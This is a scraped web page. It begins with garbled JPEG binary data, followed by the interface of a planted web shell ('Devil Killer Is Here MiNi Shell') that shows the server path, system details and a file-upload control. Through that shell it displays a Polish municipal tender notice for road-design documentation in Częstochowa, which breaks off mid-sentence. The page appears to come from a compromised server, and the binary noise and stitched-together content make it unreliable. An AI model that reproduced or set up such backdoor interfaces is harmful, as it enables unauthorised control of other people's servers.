JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220215/0005796701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej dla zadania: Rozbudowa ulic Jana Kochanowskiego, Jana Długosza, Bartosza Głowackiego <br/>w Częstochowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD DRÓG W CZĘSTOCHOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 150309847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Legionów 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-202</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@mzd.czest.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzd.czest.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej dla zadania: Rozbudowa ulic Jana Kochanowskiego, Jana Długosza, Bartosza Głowackiego <br/>w Częstochowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77641423-8e5e-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00057967</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00015310/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Opracowanie dokumentacji dla zadania: rozbudowa ulic Jana Kochanowskiego, Jana Długosza, Bartosza Głowackiego w Częśtochowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/mzd/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/mzd/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji postępowania nie wymaga<br/>logowania. Wykonawca celem złożenia oferty bezpłatnie rejestruje się na Platformie pod wyżej<br/>wymienionym adresem klikając przycisk „Załóż konto”. Wykonawca rejestrując się zapoznaje się i<br/>akceptuje warunki korzystania z Platformy, określone w regulaminie podczas rejestracji oraz uznaje go<br/>za wiążący. Do rejestracji niezbędne jest zainstalowanie programu Java w ver.1.8. Szczegółowe<br/>informacje dotyczące sposobu wykonania tych czynności znajdują się w „Instrukcja obsługi Portalu e-<br/>Usług SmartPZP”, dostępnej na stronie Platformy. Wykonawca posiadający konto ma dostęp<br/>do następujących formularzy: złożenia, zmiany i wycofania oferty lub wniosku oraz formularza „Pytania<br/>i odpowiedzi”. Szczegółowa instrukcja użytkownika Wykonawcy portalu SmartPzp dostępna jest na<br/>stronie portalu SmartPzp w zakładce e-learning. Niezbędne wymagania sprzętowo aplikacyjne<br/>umożliwiające pracę na Platformie: a) Stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 1 Mb/s; b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB<br/>RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0 , Windows<br/>7iMac OS 10.12 - lub ich nowsze wersje; c) Zainstalowana przeglądarka<br/>internetowa:Internet Explorer 11, Mozilla Firefox ver. 46 i późniejsze, Google Chrome ver. 45 i<br/>późniejsze lub Opera ver. 37 i późniejsze; Przeglądarki zalecane: Mozilla Firefox, Google Chrome lub<br/>Opera. d) Włączona obsługa JavaScript;e) Oprogramowanie Java ver. 1.8 lub wyższe; f)<br/>Zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf. Oferta oraz<br/>wszelkie dokumenty wymagające podpisu podpisywane są w postępowaniu: kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym Wszelkie informacje dotyczące<br/>korespondencji elektronicznej są wskazane w SWZ w pkt 9.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W przedmiotowym postępowaniu o udzielenie zamówienia<br/>publicznego są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami RODO. Dane<br/>te dotyczą Wykonawcy będącego osobą fizyczną prowadzącą jednoosobową działalność<br/>gospodarczą,pełnomocnika (osoby fizycznej, której dane osobowe zamieszczone są w<br/>pełnomocnictwie) Wykonawcy, członka organu zarządzającego Wykonawcy (osoby fizycznej, której<br/>dane osobowe zamieszczone są w informacji z KRK), podwykonawcy będącego osobą fizyczną<br/>prowadzącą działalność gospodarczą, jego pełnomocnika (osoby fizycznej), informacji o osobach, które<br/>Wykonawca przedłożył w ww. przetargu celem wykazania spełniania warunków udziału w<br/>postępowaniu, braku podstaw wykluczenia z postępowania, jak i potwierdzenia wymogów.<br/>Zamawiającego dotyczących wykonania przedmiotu zamówienia (np. osób, których dane służą do<br/>wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, osób kierowanych do<br/>realizacji zamówienia, osób fizycznych prowadzących działalność gospodarczą, które zostaną<br/>wskazane jako podwykonawca). Regulacje RODO związane z ochroną danych osobowych mają też<br/>zastosowanie do umowy zawartej w wyniku niniejszego postępowania oraz do dokumentacji<br/>zgromadzonej w związku z przeprowadzeniem przedmiotowego postępowania. Obowiązek<br/>informacyjny, jak w przypadku pozyskiwania danych osobowych bezpośrednio od Wykonawcy<br/>powstanie, gdy Zamawiający uzyska od Wykonawcy dane osobowe dotyczące innych osób (np. osób,<br/>których dane służą do wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu,<br/>osób kierowanych do realizacji zamówienia, osób fizycznych prowadzących działalność gospodarczą,<br/>które zostaną wskazane jako podwykonawca). Obowiązek ten jest uregulowany w art. 14 RODO.<br/>Zamawiający może odstąpić od obowiązku indywidualnego informowania każdej z takich osób, w<br/>przypadkach, o których mowa w art. 14 ust. 5 RODO, np. w sytuacji, gdy osoba ta dysponuje już tymi<br/>informacjami albo gdy wymagałoby to ze strony Zamawiającego niewspółmiernie dużego wysiłku.<br/>Obowiązek informacyjny określony przepisami RODO spoczywa także na Wykonawcach, którzy<br/>pozyskują dane osobowe osób trzecich w celu przekazania ich Zamawiającym w ofertach. Dla<br/>uzyskania przez Zamawiającego potwierdzenia, że osoby, których dane osobowe są przekazywane<br/>Zamawiającemu, dysponują już wskazanymi informacjami, jak również w celu właściwego<br/>zabezpieczenia i ochrony danych tych osób, z których Wykonawca będzie korzystał, przekazanych<br/>przez Wykonawcę w ofercie celem uzyskania przedmiotowego zamówienia publicznego wymagane<br/>jest oświadczenie Wykonawcy dotyczące pozyskania przez Wykonawcę danych osobowych od osób<br/>trzecich, które zawarte jest w Formularzu oferty (załącznik nr 7 do SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZD.ZP.26.31.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia dotyczy opracowania dokumentacji projektowej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego i Rozporządzeniem Ministra Rozwoju z dnia 11 września 2020r. w sprawie szczegółowego zakresu i formy projektu budowlanego dla zadania pod nazwą: Rozbudowa ulic Jana Kochanowskiego, Jana Długosza, Bartosza Głowackiego w Częstochowie, obejmującej:<br/>a)	projekt budowlany - w ilości 5 egzemplarzy;<br/>b)	projekt wykonawczy - w ilości 3 egzemplarzy;<br/>c)	przedmiary robót - w ilości 2 egzemplarzy;<br/>d)	informacji dotyczącej bezpieczeństwa i ochrony zdrowia - w ilości 4 egzemplarzy ;<br/>e)	kosztorysy inwestorskie należy przekazać w formacie „pdf” oraz w wersji edytowalnej w rozszerzeniu „ath - w ilości 2 egzemplarzy;<br/>f)	szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych – w ilości 2 egzemplarzy;<br/>g)	projekt organizacji ruchu także formacie dwg - w ilości 4 egzemplarzy + 1 egz formacie dwg. Należy uwzględnić oznakowanie ulic tabliczkami z ich nazwami. Tabliczki i słupki muszą być zgodne z obowiązującym wzorem Miejskiego Systemu Informacji Turystycznej. <br/>Projekt budowlany winien zawierać następujące elementy:<br/>h)	projekt zagospodarowania terenu;<br/>i)	projekt architektoniczno-budowlany;<br/>j)	projekt techniczny.<br/>Projekt budowlany winien obejmować:<br/>	część drogowa,<br/>	odwodnienie (zgodnie z załączonymi warunkami),<br/>	oświetlenie drogowe i kanał technologiczny (zgodnie z załączonymi warunkami),<br/>	projekty budowlane koniecznej przebudowy kolidujących sieci uzbrojenia terenu<br/>podziemnego i nadziemnego. Przygotować tabele kolizji wraz z określeniem daty w którym roku sieć została umieszczona w pasie drogowym. O warunki Gestorów sieci, Wykonawca dokumentacji projektowej wystąpi we własnym zakresie.<br/>	badania geotechniczne podłoża gruntowego zawierające:<br/>a)	wskaźnik nośności CBR,<br/>b)	wskaźnik zagęszczenie,<br/>c)	ocenę przydatności gruntu podłoża dla inwestycji drogowej,<br/>d)	moduł odkształcenia podłoża pierwotny i wtórny,<br/>e)	poziom zwierciadła wody gruntowej,<br/>f)	rozstaw otworów badawczych co 50,00m,<br/>Badania geotechniczne podłoża gruntowego należy wykonać w miejscach projektowanej jezdni.<br/>	inwentaryzację i projekt zieleni – W przypadku konieczności wycięcia drzew kolidujących z inwestycja, a spełniających kryteria pomnika przyrody, bądź uznanej za pomnik przyrody zgodnie z Rozporządzeniem Ministra Środowiska z dnia 4 grudnia 2017r. w sprawie kryteriów uznawania towarów przyrody ożywionej i nieożywionej za pomnik przyrody, należy uzyskać opinie dendrologa i wykonać USG wycinanych drzew. <br/>dodatkowo należy:<br/>	przygotować materiały do uzyskania decyzji zrid, w tym mapy z projektami podziałów (ok. 15 działek) po 8 szt. zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. Liczba działek do ewentualnego podziału jest orientacyjna. Ostateczna liczba działek do podziału będzie wynikała z zatwierdzonej przez Zamawiającego koncepcji drogowej,<br/>	uzyskać opinie do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych:<br/>•	Wydziału Mienia i Nadzoru Właścicielskiego Urzędu Miasta Częstochowy;<br/>•	Wojewódzkiego Urzędu Ochrony Zabytków w Katowicach, Oddział w Częstochowie;<br/>•	Wojewódzkiego Sztabu Wojskowego w Katowicach;<br/>•	Miejskiej Pracowni Urbanistyczno - Planistycznej w Częstochowie;<br/>•	Zarządu Województwa Śląskiego w Katowicach;<br/>	Przygotować projekt wniosku o uzyskanie decyzji zezwalającej na realizacje inwestycji drogowej (ZRID) zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych. <br/> w przypadku likwidacji urządzeń wodnych opracować operat wodnoprawny oraz uzyskać pozwolenie wodnoprawne na likwidację urządzenia wodnego.<br/><br/>Do obowiązków wykonawcy należy również:<br/>• wykonanie koncepcji rozwiązań projektowych,<br/>• wystąpienie o ewentualnie brakujące warunki do gestorów sieci,<br/>• przygotowanie tabeli kolizji wraz z kopiami warunki od gestorów sieci, które winny zawierać daty umieszczona ww. sieci w pasie drogowym – patrz pkt. 2.2., <br/>•	wykonanie mapy do celów projektowych,<br/>•	uzgodnienie kosztorysów inwestorskich z poszczególnymi gestorami sieci w przypadku gdy przebudowa ich nie leży po stronie Zamawiającego.<br/>•	w razie konieczności przygotować wniosek o uzyskanie odstępstwa od przepisów Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie oraz uczestniczyć w jego uzyskaniu.<br/><br/><br/>Dokumentacja zostanie dostarczona Zamawiającemu w formie druku w ilościach wskazanych w powyżej oraz w formie elektronicznej na nośniku magnetycznym w formacie „pdf” oraz w wersji edytowalnej („dwg”, „dxf” CAD wersja do 2012 „doc”). Kosztorysy inwestorskie oraz przedmiary robót należy przekazać również w wersji edytowalnej w rozszerzeniu „ath. Każdy pojedynczy plik danych nie może ważyć więcej niż 99MB (dziewięćdziesiąt dziewięć megabajtów).<br/> <br/>Zapis dokumentacji w formacie „pdf”, który będzie stanowił załącznik do przetargu na wyłonienie wykonawcy robót budowlanych nie może zawierać danych osobowych.<br/><br/><br/><br/>W ofercie cenowej należy wyszczególnić koszt opracowania: planu wycinki drzew i krzewów oraz kanału technologicznego.<br/>Pełny opis przedmiotu zamówienia stanowi załącznik do: swz nr 9 i umowy nr 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZŁOŻENIA KOMPLETNEJ KONCEPCJI INWESTYCJI DO ZATWIERDZENIA W DNIACH KALENDARZOWYCH od DNIA PODPISANIA UMOWY (minimum 30 dni kalendarzowych, maksymalnie 50 dni kalendarzowych od dnia podpisania umowy)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki,<br/>dotyczące zdolności technicznej lub zawodowej.<br/>I. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy skierują do realizacji<br/>zamówienia publicznego osoby posiadające uprawnienia do projektowania bez ograniczeń w<br/>specjalnościach:<br/>- 1 - osoba - inżynieryjnej drogowej;<br/>- 1 - osoba - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych;<br/>- 1 - osoba - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych<br/>i kanalizacyjnych.<br/>Uwaga:<br/>Osoby wykonujące usługę powinny posiadać uprawnienia budowlane do projektowania bez<br/>ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2016<br/>r. poz. 290 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury<br/>i Rozwoju z dnia 11września 2014 r. w sprawie samodzielnych funkcji technicznych w<br/>budownictwie (tekst jedn. Dz. U. z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016<br/>r. poz. 65).<br/>II. O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykonali, a w przypadku<br/>świadczeń okresowych lub ciągłych również wykonują, główne usługi, w okresie ostatnich trzech<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, przynajmniej jedną usługę polegającą na wykonaniu projektu budowy lub<br/>rozbudowy drogi gminnej z pełną infrastrukturą drogową obejmującą kanalizację deszczową i<br/>budowę oświetlenia ulicznego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">OŚWIADCZENIE DOTYCZĄCE PRZESŁANEK WYKLUCZENIA Z POSTĘPOWANIA - Oświadczenie<br/>dotyczące przesłanek wykluczenia postępowania należy wypełnić i podpisać przez osoby (osobę)<br/>uprawnioną. Załącznik nr 1. W celu wykazania braku podstaw do wykluczenia z postępowania o<br/>udzielenie zamówienia Zamawiający zamiast podmiotowych środków dowodowych żąda oświadczenia<br/>Wykonawcy o aktualności informacji zawartych w oświadczeniu, w którym mowa w art. 125 ust. 1<br/>ustawy-Pzp. Z wyjątkiem wykluczenia z art. 109 ust. 1 pkt 4 ustawy-Pzp, na potwierdzenie którego<br/>Zamawiający wymaga przedłożenia odpisy lub informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">OŚWIADCZENIE DOTYCZĄCE SPEŁNIANIA WARUNKÓW UDZIAŁU<br/>W POSTĘPOWANIU - Oświadczenie dotyczące spełniania warunków udziału w postępowaniu należy<br/>wypełnić i podpisać przez osoby (osobę) uprawnioną. Załącznik nr 2.<br/>WYKAZ OSÓB - Na potwierdzenie spełnienia warunku należy przedstawić wykaz osób skierowanych<br/>przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami<br/>podpisany przez osobę/y 